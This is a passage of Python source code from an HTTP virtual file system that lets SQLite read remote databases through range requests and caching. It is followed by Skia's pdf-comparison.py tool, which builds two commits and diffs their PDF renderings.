self.vfsfile.sequential_cache_gap_tolerance)
close_to_last_start = (
abs(c.running_hit_last_start - end) <
self.vfsfile.sequential_cache_gap_tolerance)
small_read = self.vfsfile.sequential_cache_default_read * 2 # noqa
if start >= 0 and c.length_of_data() >= end:
# Cache hit
# Keeps track of the total running
# amount of sequentially read
# bytes on the cache, and the direction
if start >= c.running_hit_last_end:
# Forward sequential
c.running_forward_hit_amount = \
c.running_forward_hit_amount + amount
if (c.running_forward_hit_amount !=
c.running_backward_hit_amount):
c.running_hit_direction = max(
(c.running_forward_hit_amount, 1),
(c.running_backward_hit_amount, -1))[1]
else:
c.running_hit_direction = 1
if end <= c.running_hit_last_start:
# Backward sequential
c.running_backward_hit_amount = \
c.running_backward_hit_amount + amount
if (c.running_forward_hit_amount !=
c.running_backward_hit_amount):
c.running_hit_direction = max(
(c.running_forward_hit_amount, 1),
(c.running_backward_hit_amount, -1))[1]
else:
c.running_hit_direction = -1
c.running_hit_amount = max(
c.running_forward_hit_amount,
c.running_backward_hit_amount)
c.running_hit_last_start = start
c.running_hit_last_end = end
c.time = time.time()
return_val = (
c.running_hit_amount,
c.running_hit_direction,
c.running_forward_hit_amount,
c.running_backward_hit_amount,
start,
end,
c
)
c.save_cache()
elif (
(return_val[0] is None or (isinstance(return_val, list) and
c.running_hit_amount > return_val[0])) and # noqa
start >= c.running_hit_last_end and
close_to_last_end
):
# Complete cache miss, but it is still a close forward
# sequential read of the current cache, return
# the running sequentially read byte information
# so it can be added to the next cache
return_val[1] = 1
if return_val[1] != c.running_hit_direction:
return_val[0] = small_read
return_val[2] = small_read
return_val[3] = small_read
else:
return_val[0] = c.running_hit_amount
return_val[2] = c.running_forward_hit_amount
return_val[3] = c.running_backward_hit_amount
elif (
(return_val[0] is None or (isinstance(return_val, list) and
c.running_hit_amount > return_val[0])) and # noqa
end <= c.running_hit_last_start and
close_to_last_start
):
# Partial cache miss, but it is still a close backward
# sequential read of the current cache, return
# the running sequentially read byte information
# so it can be added to the next cache
return_val[1] = -1
if return_val[1] != c.running_hit_direction:
return_val[0] = small_read
return_val[2] = small_read
return_val[3] = small_read
else:
return_val[0] = c.running_hit_amount
return_val[2] = c.running_forward_hit_amount
return_val[3] = c.running_backward_hit_amount
return return_val
def write_data(self, start_offset, data, amount, offset):
"""Writes data fetched to the network cache and
returns only the amount requested back."""
# Writes the entire data fetched to the cache
if self.vfsfile.should_cache:
# Uses itself as a cache object
self._start_offset = start_offset
self.set_data(data)
if self.vfsfile.trace_log:
print("[HTTPVFS] Cache Size: %d bytes" % (self.cache_size,))
# Purge old caches
current_time = time.time()
if ((current_time -
self.vfsfile.last_cache_purge) >
self.vfsfile.ttl_purge_interval):
if self.vfsfile.trace_log:
print("[HTTPVFS] Purging expired caches...")
self.vfsfile.last_cache_purge = current_time
self.delete_caches()
# Adds itself to the cache array, so the next read
# succeeds
self.add_to_caches()
return data[offset -
start_offset: (offset - start_offset) + amount]
def _prefetch_in_background(
self,
_prefetch_in_background,
amount,
offset,
sequential):
"""Prefetches data from the network to the cache."""
# Store the extra data fetched back in the network cache
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Prefetching in background @ %d + %d" %
(offset, amount))
try:
if sequential:
data = _prefetch_in_background(
self.vfsfile.SEQUENTIAL, amount, offset)
else:
data = _prefetch_in_background(
self.vfsfile.RANDOM_ACCESS, amount, offset)
cache = HTTPVFSFileCache(self.vfsfile)
if data:
cache.write_data(offset, data, 0, offset)
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Finished prefetching @ %d + %d" %
(offset, amount))
else:
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Prefetching terminated early @ %d + %d" %
(offset, amount))
except BaseException:
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Prefetching error @ %d + %d" %
(offset, amount))
pass
def prefetch_in_background(
self,
_prefetch_in_background,
amount,
offset,
sequential=False):
"""Prefetches data from the network to the cache
in the background."""
if self.vfsfile.trace_log:
if sequential:
print(
"[HTTPVFS] Sequential prefetching "
"request @ %d + %d" %
(offset, amount))
else:
print(
"[HTTPVFS] Random access prefetching "
"request @ %d + %d" %
(offset, amount))
self.vfsfile.prefetch_threads = [
t for t in self.vfsfile.prefetch_threads if t.is_alive()]
if (len(self.vfsfile.prefetch_threads) <=
self.vfsfile.prefetch_thread_limit or sequential):
prefetch_thread = threading.Thread(
target=self._prefetch_in_background,
args=(
_prefetch_in_background,
amount,
offset,
sequential),
name='HTTPVFSFileCache' +
(
'Sequential' if sequential else '') +
'PrefetchThread@' +
str(offset) +
'+' +
str(amount))
prefetch_thread.daemon = True
if sequential:
if self.vfsfile.sequential_prefetch_thread:
self.vfsfile.sequential_prefetch_thread.do_run = False
self.vfsfile.sequential_prefetch_thread = prefetch_thread
else:
self.vfsfile.prefetch_threads.append(prefetch_thread)
prefetch_thread.start()
else:
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Ignoring prefetch request @ %d + %d, "
"reached prefetch thread limit" %
(offset, amount))
def read_data(self, amount, offset, _prefetch_in_background=None):
"""Reads data from the network cache and
returns only the amount requested back, or
returns None if there is a cache miss, and prefetches more data
into the cache using _prefetch_in_background(amount, offset)
if it detects a non-sequential access pattern in the
cache misses."""
# Don't do anything if caching is disabled
if not self.vfsfile.should_cache:
return None
# Find the closest cache match
current_time = time.time()
(
running_hit_amount,
running_hit_direction,
running_forward_hit_amount,
running_backward_hit_amount,
start,
end,
cache
) = self.get_cache(amount, offset)
if running_hit_amount is not None:
if (self.vfsfile.sequential_cache_exponential_read_growth and
cache is None):
# Reached a cache miss, but still sequentially reading
# If exponential sequential cache reads are on, double the
# read size
running_hit_amount = min(
running_hit_amount * 2,
self.vfsfile.sequential_cache_max_read)
running_forward_hit_amount = min(
running_forward_hit_amount * 2,
self.vfsfile.sequential_cache_max_read)
running_backward_hit_amount = min(
running_backward_hit_amount * 2,
self.vfsfile.sequential_cache_max_read)
self.running_forward_hit_amount = running_forward_hit_amount
self.running_backward_hit_amount = running_backward_hit_amount
self.running_hit_amount = running_hit_amount
self.running_hit_direction = running_hit_direction
self.vfsfile.running_hit_direction = running_hit_direction
if cache is None:
self.vfsfile.cache_amount = min(
running_hit_amount,
self.vfsfile.sequential_cache_max_read
)
self.save_cache()
else:
if cache is None:
# Cache miss, and not a sequential read, only read a small amount
self.vfsfile.cache_amount = \
self.vfsfile.sequential_cache_default_read
self.save_cache()
if cache:
data = cache.get_data()[start:end]
# Adjust the cache amount for the next read
self.vfsfile.running_hit_direction = cache.running_hit_direction
self.vfsfile.cache_amount = min(
cache.running_hit_amount,
self.vfsfile.sequential_cache_max_read)
return data
elif self.vfsfile.random_access_cache_prefetch:
# Keep track of regions of the file where there are cache
# misses. Each "hit" on a file is analyzed and clustered into
# "groups" of hits, sequential "hits" are ignored.
# Purge old hit patterns
if (current_time - self.vfsfile.last_random_access_hit_tracker_purge) > self.vfsfile.ttl_purge_interval: # noqa
if self.vfsfile.trace_log:
print("[HTTPVFS] Purging expired hit trackers...")
self.vfsfile.last_random_access_hit_tracker_purge = \
current_time
self.vfsfile.hit_pattern = [hit for hit in self.vfsfile.hit_pattern if ((current_time - hit[4]) <= self.vfsfile.random_access_hit_tracker_ttl)] # noqa
# Find the closest cluster of hits for the current miss
hit_index = bisect.bisect_left(
KeyList(
self.vfsfile.hit_pattern,
key=lambda x: x[0]),
offset)
hit_index_area = []
if hit_index - 1 >= 0:
hit_index_area.append(hit_index - 1)
if hit_index < len(self.vfsfile.hit_pattern):
hit_index_area.append(hit_index)
if len(hit_index_area) > 0:
hit_index = min(
hit_index_area, key=lambda x: abs(
self.vfsfile.hit_pattern[x][0] - offset))
# Add the current miss to the closest cluster, and evaluate
# if it should be prefetched
hit = self.vfsfile.hit_pattern[hit_index]
dist = abs(hit[0] - offset)
if dist <= self.vfsfile.random_access_cache_range:
self.vfsfile.hit_pattern[hit_index] = [
(offset + hit[0]) / 2.0,
(dist + hit[1]) / 2.0 if dist > hit[1] else hit[1],
hit[2] + 1 if offset > hit[0] else hit[2],
hit[3] + 1 if offset < hit[0] else hit[3],
current_time]
hit = self.vfsfile.hit_pattern[hit_index]
if hit[2] >= hit[3] * 2 and (hit[2] + hit[3]) > 8:
# Looks like a forward sequential read pattern,
# ignore
del self.vfsfile.hit_pattern[hit_index]
elif hit[3] >= hit[2] * 2 and (hit[2] + hit[3]) > 8:
# Looks like a backward sequential read pattern,
# ignore
del self.vfsfile.hit_pattern[hit_index]
elif (_prefetch_in_background and (hit[2] > 2) and
(hit[3] > 2) and (hit[2] + hit[3]) > 30):
# If a certain region of the file, is being "hit"
# frequently for small chunks of data within a
# larger range, prefetch that region of the file
# and data surrounding it to prevent future
# cache misses
self.prefetch_in_background(
_prefetch_in_background, int(
hit[1] * 2), max(int(hit[0] - hit[1]), 0)
)
return None
# mean, range, positive direction, negative direction, time
self.vfsfile.hit_pattern.insert(
hit_index, [offset, 0, 0, 0, current_time])
class HTTPVFSFileMemoryMappedCache(HTTPVFSFileCache):
""" This cache is like HTTPVFSFileCache
except all cache data is memory mapped
"""
def __init__(self, vfsfile, cache_dir_path, cache_key=None):
self.cache_dir_path = cache_dir_path
self.cache_key = cache_key
HTTPVFSFileCache.__init__(self, vfsfile)
if self.cache_key and self.cache_key != '.DS_Store':
cache_key_split = cache_key.split('.')[0].split('_')
self._start_offset = int(cache_key_split[0])
self.running_hit_direction = int(cache_key_split[1])
self.running_hit_last_start = (
float(
cache_key_split[2])
if cache_key_split[2] == 'inf' else int(
cache_key_split[2]))
self.running_hit_last_end = int(cache_key_split[3])
self.running_forward_hit_amount = int(cache_key_split[4])
self.running_backward_hit_amount = int(cache_key_split[5])
self.running_hit_amount = int(cache_key_split[6])
self.time = float(cache_key_split[7])
self.id = int(cache_key_split[8])
else:
self.cache_key = self.create_key()
def length_of_data(self):
"""Returns the length of the cached data."""
try:
return os.path.getsize(os.path.join(self.cache_dir_path,
self.cache_key))
except BaseException:
return 0
def add_to_mmaps(self, new, mm):
"""Adds a new mmap, evicting old mmaps if the maximum has been
reached."""
while (len(self.vfsfile.cache_mmaps_heap) >=
self.vfsfile.mmap_max_files):
_, evict = heapq.heappop(self.vfsfile.cache_mmaps_heap)
try:
evict_mm = self.vfsfile.cache_mmaps[evict]
except BaseException:
pass
try:
evict_mm.close()
except BaseException:
pass
try:
del self.vfsfile.cache_mmaps[evict]
except BaseException:
pass
heapq.heappush(self.vfsfile.cache_mmaps_heap,
(time.time(), new))
self.vfsfile.cache_mmaps[new] = mm
def get_mmap(self, create=True):
"""Gets the mmap for a key, opening a mmap to the file
if a mmap doesn't exist, creating a file, then opening a mmap
to it if the file doesn't exist."""
if (self.cache_key not in self.vfsfile.cache_mmaps and create):
joined = os.path.join(self.cache_dir_path,
self.cache_key)
if os.path.exists(os.path.join(self.cache_dir_path,
self.cache_key)):
f = open(joined, "r+b")
mm = mmap.mmap(f.fileno(), self.length_of_data())
f.close()
else:
f = open(joined, "w+b")
f.write("\0".encode('utf-8'))
f.flush()
os.fsync(f.fileno())
mm = mmap.mmap(f.fileno(), 1)
f.close()
self.add_to_mmaps(self.cache_key, mm)
try:
return self.vfsfile.cache_mmaps[self.cache_key]
except BaseException as e:
if create:
return e
else:
return None
def get_data(self):
"""Returns the cached data."""
return self.get_mmap()
def set_data(self, data):
"""Sets the cached data."""
self.save_cache()
mm = self.get_mmap(create=False)
try:
del self.vfsfile.cache_mmaps[self.cache_key]
except BaseException:
pass
try:
mm.close()
except BaseException:
pass
f = open(os.path.join(self.cache_dir_path,
self.cache_key), "w+b")
f.write(data)
f.flush()
os.fsync(f.fileno())
mm = None
mm = mmap.mmap(f.fileno(), len(data))
f.close()
self.vfsfile.cache_mmaps[self.cache_key] = mm
def create_key(self):
"""Serializes instance variables into a key."""
return '_'.join([
str(self._start_offset),
str(self.running_hit_direction),
str(self.running_hit_last_start),
str(self.running_hit_last_end),
str(self.running_forward_hit_amount),
str(self.running_backward_hit_amount),
str(self.running_hit_amount),
str(int(self.time)),
str(self.id),
]) + '.supersqlmmap'
def add_to_caches(self):
"""Adds self to the caches."""
pass
def save_cache(self):
"""Saves the cache."""
new_key = self.create_key()
old = os.path.join(self.cache_dir_path,
self.cache_key)
new = os.path.join(self.cache_dir_path, new_key)
try:
os.rename(old, new)
except BaseException:
pass
try:
mm = self.vfsfile.cache_mmaps[self.cache_key]
del self.vfsfile.cache_mmaps[self.cache_key]
self.add_to_mmaps(new_key, mm)
except BaseException:
pass
self.cache_key = new_key
def delete_caches(self):
"""Deletes old caches."""
current_time = time.time()
for cache in self.vfsfile._get_caches():
if cache.id == self.id:
continue
if (current_time - cache.time) > self.vfsfile.cache_ttl:
try:
mmap = cache.get_mmap(create=False)
except BaseException:
pass
try:
del self.vfsfile.cache_mmaps[self.cache_key]
except BaseException:
pass
try:
mmap.close()
except BaseException:
pass
try:
os.remove(os.path.join(cache.cache_dir_path,
cache.cache_key))
except BaseException:
pass
class HTTPVFSFile(apsw.VFSFile):
""" This acts as the representation of a single file on
the HTTP virtual file system.
"""
def __init__(self, inheritfromvfsname, name, flags, vfs, options=None):
# Constants
self.RANDOM_ACCESS = 0
self.SEQUENTIAL = 1
# Cache + Network configuration
defaults = {
'should_cache': True,
'network_retry_delay': 10,
'max_network_retries': 10,
'sequential_cache_default_read': 4096 * 2,
'sequential_cache_gap_tolerance': 10 * (1024 ** 2),
'sequential_cache_max_read': 20 * (1024 ** 2),
'sequential_cache_exponential_read_growth': True,
'prefetch_thread_limit': 3,
'sequential_cache_prefetch': True,
'random_access_cache_prefetch': True,
'random_access_cache_range': 100 * (1024 ** 2),
'random_access_hit_tracker_ttl': 60,
'cache_ttl': 60,
'ttl_purge_interval': 5,
'use_mmap': False,
'mmap_max_files': 10,
'temp_dir': tempfile.gettempdir(),
'trace_log': False,
}
defaults.update(options or {})
for k, v in defaults.items():
setattr(self, k, v)
self.max_network_retries = max(self.max_network_retries, 4)
if not self.should_cache:
self.sequential_cache_prefetch = False
self.random_access_cache_prefetch = False
self.sequential_cache_default_read = 0
self.cache_amount = 0
# Cache initialization
self.caches = []
self.cache_mmaps_heap = []
self.cache_mmaps = {}
self.cache_amount = self.sequential_cache_default_read
self.last_cache_purge = 0
self.last_random_access_hit_tracker_purge = 0
# Prefetch Connections
self.pconn_terminated = {}
self.pconn_count = {}
self.pconn = {}
# Connection lock
self.conn_lock = threading.RLock()
# State to keep tracking adjusting the predictive network cache
# window
self.running_hit_direction = 0
self.hit_pattern = []
# Keep track of threads
self.prefetch_threads = []
self.sequential_prefetch_thread = None
# Initialization
self.vfs = vfs
self.length = 99999999999999999
self.name = name
self.tries = 1
self.url = self.name.filename()
url_cis = self.url.lower()
try:
self.url = self.url[url_cis.index('http://'):]
self.parsed_url = urlparse(self.url)
self._prepare_connection()
if self.random_access_cache_prefetch:
self._prepare_prefetch_connection(self.RANDOM_ACCESS)
if self.sequential_cache_prefetch:
self._prepare_prefetch_connection(self.SEQUENTIAL)
except BaseException:
try:
self.url = self.url[url_cis.index('https://'):]
self.parsed_url = urlparse(self.url)
self._prepare_connection()
if self.random_access_cache_prefetch:
self._prepare_prefetch_connection(self.RANDOM_ACCESS)
if self.sequential_cache_prefetch:
self._prepare_prefetch_connection(self.SEQUENTIAL)
except BaseException:
raise RuntimeError("Invalid URL.")
self.cache_dir = (
hashlib.md5(
self.url.encode('utf-8')).hexdigest() +
'_supersqlmmap')
self.cache_dir_path = os.path.join(self.temp_dir, self.cache_dir)
try:
os.makedirs(self.cache_dir_path + '/')
except OSError:
pass
# Prepare the VFS
apsw.VFSFile.__init__(self, inheritfromvfsname, os.devnull, flags)
def _new_connection(self):
"""Creates an HTTP connection"""
if self.parsed_url.scheme.lower() == 'http':
return http.client.HTTPConnection(
self.parsed_url.netloc, timeout=60)
else:
return http.client.HTTPSConnection(
self.parsed_url.netloc, timeout=60)
def _prepare_connection(self, new=True):
"""Prepares a new HTTP connection"""
try:
self.conn.close()
except BaseException:
pass
if new:
self.conn = self._new_connection()
def _prepare_prefetch_connection(self, n, new=True):
"""Prepares a new HTTP connection"""
try:
self.pconn_terminated[n] = True
while self.pconn_count[n] > 0:
sleep(1)
self.pconn[n].close()
except BaseException:
pass
if new:
self.pconn[n] = self._new_connection()
self.pconn_count[n] = 0
self.pconn_terminated[n] = False
def _wait_on_prefetch_connection(self, n):
self.pconn_count[n] += 1
def _unwait_on_prefetch_connection(self, n):
self.pconn_count[n] -= 1
def _network_error(self, e, i):
"""Handles an network error"""
if self.trace_log:
print("[HTTPVFS] Network Error: %s" % (str(e),))
if i + 1 >= self.tries:
raise RuntimeError(
"Could not reach the server at: '" + self.url + "'")
else:
if self.trace_log:
print("[HTTPVFS] Refreshing network connection...")
self.conn_lock.acquire()
self._prepare_connection()
self.conn_lock.release()
if i > 2:
if self.trace_log:
print("[HTTPVFS] Waiting before retrying...")
sleep(self.network_retry_delay)
if self.trace_log:
print("[HTTPVFS] Retrying...")
def _prefetch_in_background(self, n, amount, offset):
headers = {
'Range': "bytes=" + str(max(offset, 0)) + "-" + str(
min((offset + amount) - 1, self.length) # noqa
),
}
self._wait_on_prefetch_connection(n)
while not self.pconn_terminated[n]:
try:
self.pconn[n].request(
"GET", self.parsed_url.path, headers=headers)
break
except CannotSendRequest:
sleep(1)
while not self.pconn_terminated[n]:
try:
res = self.pconn[n].getresponse()
break
except ResponseNotReady:
# Since we are sharing the connection wait for this to be
# ready
sleep(1)
if self.pconn_terminated[n]:
self._unwait_on_prefetch_connection(n)
return
else:
self._unwait_on_prefetch_connection(n)
if not (200 <= res.status <= 299):
# Check for a valid status from the server
return
data = bytearray(res.length)
i = 0
for piece in iter(lambda: res.read(1024), b''):
if not getattr(threading.currentThread(), "do_run", True):
break
data[i:i + len(piece)] = piece
i = i + len(piece)
else:
return bytes(data)
# Leaving the thread early, without
# reading all of the data this will
# make the connection unusable, refresh it
self._prepare_prefetch_connection(n)
def _get_caches(self):
"""Gets all of the caches."""
if self.use_mmap:
return [
HTTPVFSFileMemoryMappedCache(
self,
self.cache_dir_path,
cache_key) for cache_key in os.listdir(
self.cache_dir_path)]
else:
return self.caches
def xRead(self, amount, offset): # noqa: N802
"""Intercepts SQLite's file read command"""
if self.trace_log:
print("[HTTPVFS] Read request @ %d + %d" % (offset, amount))
for i in range(self.tries):
try:
# Try to see if we have already read the data
# and cached it
if self.use_mmap:
cache = HTTPVFSFileMemoryMappedCache(
self, self.cache_dir_path)
else:
cache = HTTPVFSFileCache(self)
data = cache.read_data(
amount, offset, self._prefetch_in_background)
if data is None:
if self.trace_log and self.should_cache:
print(
"[HTTPVFS] Cache miss for request @ %d + %d" %
(offset, amount))
# Fire off a network request with the range of bytes
# (potentially predicatively reading a larger amount
# and storing it in the network cache)
if self.running_hit_direction >= 0:
# Read the amount requested + extra
# in the forward sequential direction
# to save in the cache
start = max(offset, 0)
end = min(
(offset + max(self.cache_amount, amount)) - 1,
self.length)
else:
# Read the amount requested + extra
# in the backward sequential direction
# to save in the cache
start = max(offset - self.cache_amount, 0)
end = min((offset + amount) - 1, self.length)
# Cancel any previous sequential prefetches, the current
# chunk of data was requested too fast for any
# background prefetches to load the cache, must
# request it synchronously
if self.sequential_prefetch_thread:
self.sequential_prefetch_thread.do_run = False
# Synchronously request the current chunk from the
# network
headers = {
'Range': "bytes=" + str(start) + "-" + str(end),
}
self.conn_lock.acquire()
self.conn.request(
"GET", self.parsed_url.path, headers=headers)
res = self.conn.getresponse()
if not (200 <= res.status <= 299):
# Check for a valid status from the server
raise RuntimeError(
"HTTP Status Code Error from Server")
if self.trace_log:
print(
"[HTTPVFS] Fetching @ %d + %d for "
"request @ %d + %d" %
(start, 1 + end - start, offset, amount))
data = res.read()
self.conn_lock.release()
if self.trace_log:
print(
"[HTTPVFS] Done fetching @ %d + %d for "
"request @ %d + %d" %
(start, 1 + end - start, offset, amount))
# Store the extra data fetched back in the network cache
data = cache.write_data(start, data, amount, offset)
# Prefetch the next sequential chunk of data in the
# background
if self.sequential_cache_prefetch and self.should_cache:
if self.running_hit_direction >= 0:
cache.prefetch_in_background(
self._prefetch_in_background,
self.cache_amount,
start + self.cache_amount * 1,
sequential=True)
else:
cache.prefetch_in_background(
self._prefetch_in_background,
self.cache_amount,
start - self.cache_amount * 1,
sequential=True)
else:
if self.trace_log:
print(
"[HTTPVFS] Cache hit for request @ %d + %d" %
(offset, amount))
# Return the data to SQLite
return data
except BaseException as e:
try:
self.conn_lock.release()
except BaseException:
pass
# Handle a network error
self._network_error(e, i)
def xWrite(self, data, offset): # noqa: N802
"""Intercepts SQLite's file write command"""
# Can't write to an HTTP server, ignore
pass
def xFileSize(self): # noqa: N802
"""Intercepts SQLite's file size command"""
for i in range(self.tries):
try:
# Fire off a content-length request to the server
self.conn_lock.acquire()
self.conn.request("GET", self.parsed_url.path)
res = self.conn.getresponse()
self.tries = self.max_network_retries
self.length = res.length
self._prepare_connection()
self.conn_lock.release()
return self.length
except BaseException as e:
try:
self.conn_lock.release()
except BaseException:
pass
# Handle a network error
self._network_error(e, i)
def xClose(self): # noqa: N802
"""Intercepts SQLite's file close command"""
ident = self.name.filename()
with self.vfs.files_lock:
if ident in self.vfs.files:
if self.vfs.files[ident][0] <= 1:
for t in self.prefetch_threads:
t.do_run = False
if self.sequential_prefetch_thread:
self.sequential_prefetch_thread.do_run = False
self._prepare_prefetch_connection(
self.RANDOM_ACCESS, new=False)
self._prepare_prefetch_connection(
self.SEQUENTIAL, new=False)
self._prepare_connection(new=False)
del self.vfs.files[ident]
while len(self.cache_mmaps_heap) > 0:
_, evict = heapq.heappop(self.cache_mmaps_heap)
try:
evict_mm = self.cache_mmaps[evict]
except BaseException:
pass
try:
evict_mm.close()
except BaseException:
pass
try:
del self.cache_mmaps[evict]
except BaseException:
pass
else:
self.vfs.files[ident] = (
self.vfs.files[ident][0] - 1,
self.vfs.files[ident][1])
class HTTPVFS(apsw.VFS):
""" This acts as the representation of a filesystem that
proxies to HTTP requests so that SQLite can connect
to HTTP URLs.
"""
def __init__(self, vfsname="http", basevfs="", options=None):
self.vfsname = vfsname
self.basevfs = basevfs
self.options = options or {}
apsw.VFS.__init__(self, self.vfsname, self.basevfs)
self.files = {}
self.files_lock = threading.RLock()
def xOpen(self, name, flags=apsw.SQLITE_OPEN_MAIN_DB): # noqa: N802
"""Intercepts SQLite's file open command"""
flags[1] = flags[1] | apsw.SQLITE_OPEN_READONLY
if flags[0] & apsw.SQLITE_OPEN_MAIN_DB:
ident = name.filename()
with self.files_lock:
if ident not in self.files:
self.files[ident] = (1, HTTPVFSFile(
self.basevfs, name, flags, self, self.options))
else:
self.files[ident] = (
self.files[ident][0] + 1, self.files[ident][1])
return self.files[ident][1]
else:
return None
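# A hedged sketch of wiring HTTPVFS into apsw; the URL is a placeholder and
# the server must support HTTP range requests. The VFS name passed to
# apsw.Connection matches the default vfsname ("http") above.
#
#   vfs = HTTPVFS()
#   conn = apsw.Connection("http://example.com/vectors.magnitude",
#                          flags=apsw.SQLITE_OPEN_READONLY,
#                          vfs="http")
#   conn.cursor().execute("SELECT * FROM magnitude_format")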
|
pdf-comparison.py
|
#!/usr/bin/env python
# Copyright 2019 Google LLC.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''
This tool compares the PDF output of Skia's DM tool of two commits.
It relies on pdfium_test being in the PATH. To build:
mkdir -p ~/src/pdfium
cd ~/src/pdfium
gclient config --unmanaged https://pdfium.googlesource.com/pdfium.git
gclient sync
cd pdfium
gn gen out/default --args='pdf_enable_xfa=false pdf_enable_v8=false pdf_is_standalone=true'
ninja -C out/default pdfium_test
cp out/default/pdfium_test ~/bin/
'''
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
EXTRA_GN_ARGS = os.environ.get('PDF_COMPARISON_GN_ARGS', '')
REFERENCE_BACKEND = 'gl' if 'PDF_COMPARISON_NOGPU' not in os.environ else '8888'
DPI = float(os.environ.get('PDF_COMPARISON_DPI', 72))
PDF_CONFIG = 'pdf' if 'PDF_COMPARISON_300DPI' not in os.environ else 'pdf300'
BAD_TESTS = [
'image-cacherator-from-picture',
'image-cacherator-from-raster',
'mixershader',
'shadermaskfilter_image',
'tilemode_decal',
]
NINJA = 'ninja'
PDFIUM_TEST = 'pdfium_test'
NUM_THREADS = int(os.environ.get('PDF_COMPARISON_THREADS', 40))
SOURCES = ['gm']
def test_exe(cmd):
with open(os.devnull, 'w') as o:
try:
subprocess.call([cmd], stdout=o, stderr=o)
except OSError:
return False
return True
def print_cmd(cmd, o):
m = re.compile('[^A-Za-z0-9_./-]')
o.write('+ ')
for c in cmd:
if m.search(c) is not None:
o.write(repr(c) + ' ')
else:
o.write(c + ' ')
o.write('\n')
o.flush()
def check_call(cmd, **kwargs):
print_cmd(cmd, sys.stdout)
return subprocess.check_call(cmd, **kwargs)
def check_output(cmd, **kwargs):
print_cmd(cmd, sys.stdout)
return subprocess.check_output(cmd, **kwargs)
def remove(*paths):
for path in paths:
os.remove(path)
def timeout(deadline, cmd):
#print_cmd(cmd, sys.stdout)
with open(os.devnull, 'w') as o:
proc = subprocess.Popen(cmd, stdout=o, stderr=subprocess.STDOUT)
timer = threading.Timer(deadline, proc.terminate)
timer.start()
proc.wait()
timer.cancel()
return proc.returncode
def is_same(path1, path2):
if not os.path.isfile(path1) or not os.path.isfile(path2):
return os.path.isfile(path1) == os.path.isfile(path2)
with open(path1, 'rb') as f1:
with open(path2, 'rb') as f2:
while True:
c1, c2 = f1.read(4096), f2.read(4096)
if c1 != c2:
return False
if not c1:
return True
def getfilesoftype(directory, ending):
for dirpath, _, filenames in os.walk(directory):
rp = os.path.normpath(os.path.relpath(dirpath, directory))
for f in filenames:
if f.endswith(ending):
yield os.path.join(rp, f)
def get_common_paths(dirs, ext):
return sorted(list(
set.intersection(*(set(getfilesoftype(d, ext)) for d in dirs))))
def printable_path(d):
if 'TMPDIR' in os.environ:
return d.replace(os.path.normpath(os.environ['TMPDIR']) + '/', '$TMPDIR/')
return d
def spawn(cmd):
with open(os.devnull, 'w') as o:
subprocess.Popen(cmd, stdout=o, stderr=o)
def sysopen(arg):
plat = sys.platform
if plat.startswith('darwin'):
spawn(["open", arg])
elif plat.startswith('win'):
# pylint: disable=no-member
os.startfile(arg)
else:
spawn(["xdg-open", arg])
HTML_HEAD = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>DIFF</title>
<style>
body{
background-size:16px 16px;
background-color:rgb(230,230,230);
background-image:
linear-gradient(45deg,rgba(255,255,255,.2) 25%,transparent 25%,transparent 50%,
rgba(255,255,255,.2) 50%,rgba(255,255,255,.2) 75%,transparent 75%,transparent)}
div.r{position:relative;left:0;top:0}
table{table-layout:fixed;width:100%}
img.s{max-width:100%;max-height:320;left:0;top:0}
img.b{position:absolute;mix-blend-mode:difference}
</style>
<script>
function r(c,e,n,g){
t=document.getElementById("t");
function ce(t){return document.createElement(t);}
function ct(n){return document.createTextNode(n);}
function ac(u,v){u.appendChild(v);}
function cn(u,v){u.className=v;}
function it(s){ td=ce("td"); a=ce("a"); a.href=s; img=ce("img"); img.src=s;
cn(img,"s"); ac(a,img); ac(td,a); return td; }
tr=ce("tr"); td=ce("td"); td.colSpan="4"; ac(td, ct(n)); ac(tr,td);
ac(t,tr); tr=ce("tr"); td=ce("td"); dv=ce("div"); cn(dv,"r");
img=ce("img"); img.src=c; cn(img,"s"); ac(dv,img); img=ce("img");
img.src=e; cn(img,"s b"); ac(dv,img); ac(td,dv); ac(tr,td);
ac(tr,it(c)); ac(tr,it(e)); ac(tr,it(g)); ac(t,tr); }
document.addEventListener('DOMContentLoaded',function(){
'''
HTML_TAIL = '''];
for(i=0;i<z.length;i++){
r(c+z[i][0],e+z[i][0],z[i][2],c+z[i][1]);}},false);
</script></head><body><table id="t">
<tr><th>BEFORE-AFTER DIFF</th>
<th>BEFORE</th><th>AFTER</th>
<th>REFERENCE</th></tr>
</table></body></html>'''
def shard(fn, arglist):
jobs = [[arg for j, arg in enumerate(arglist) if j % NUM_THREADS == i]
for i in range(NUM_THREADS)]
results = []
def do_shard(*args):
for arg in args:
results.append(fn(arg))
thread_list = []
for job in jobs:
t = threading.Thread(target=do_shard, args=job)
t.start()
thread_list += [t]
for t in thread_list:
t.join()
return results
def shardsum(fn, arglist):
'return the number of True results returned by fn(arg) for arg in arglist.'
return sum(1 for result in shard(fn, arglist) if result)
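# A small illustration of the sharding helpers above; the file names are
# placeholders. Work is split round-robin across NUM_THREADS threads and
# per-item results are collected (order is not guaranteed).
#
#   n_present = shardsum(os.path.isfile, ['a.pdf', 'b.pdf'])
#   results = shard(os.path.isfile, ['a.pdf', 'b.pdf'])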
def checkout_worktree(checkoutable):
directory = os.path.join(tempfile.gettempdir(), 'skpdf_control_tree')
commit = check_output(['git', 'rev-parse', checkoutable]).strip()
if os.path.isdir(directory):
try:
check_call(['git', 'checkout', commit], cwd=directory)
return directory
except subprocess.CalledProcessError:
shutil.rmtree(directory)
check_call(['git', 'worktree', 'add', '-f', directory, commit])
return directory
def build_skia(directory, executable):
args = ('--args=is_debug=false'
' extra_cflags=["-DSK_PDF_LESS_COMPRESSION",'
' "-DSK_PDF_BASE85_BINARY"] ')
if test_exe('ccache'):
args += ' cc_wrapper="ccache"'
args += EXTRA_GN_ARGS
build_dir = directory + '/out/pdftest'
check_call([sys.executable, 'bin/sync'], cwd=directory)
check_call([directory + '/bin/gn', 'gen', 'out/pdftest', args],
cwd=directory)
check_call([NINJA, executable], cwd=build_dir)
return os.path.join(build_dir, executable)
def build_and_run_dm(directory, data_dir):
dm = build_skia(directory, 'dm')
for source in SOURCES:
os.makedirs(os.path.join(data_dir, PDF_CONFIG, source))
